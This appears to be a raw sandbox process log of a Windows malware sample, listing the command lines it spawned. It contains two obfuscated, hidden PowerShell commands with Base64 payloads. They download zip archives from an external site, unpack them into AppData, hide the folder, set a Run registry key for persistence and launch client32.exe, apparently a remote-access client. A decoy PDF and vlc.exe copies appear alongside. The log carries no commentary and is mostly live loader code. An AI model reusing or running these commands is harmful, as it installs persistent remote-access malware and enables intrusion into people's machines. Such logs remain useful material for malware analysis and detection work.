C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"
C:\Windows\SysWOW64\cmd.exe
cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/40be52e41f5e3624fc9f4e60a8e3d6b7/" && (for %F in (*.exe) do start "" "%F")"
C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe
"vlc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4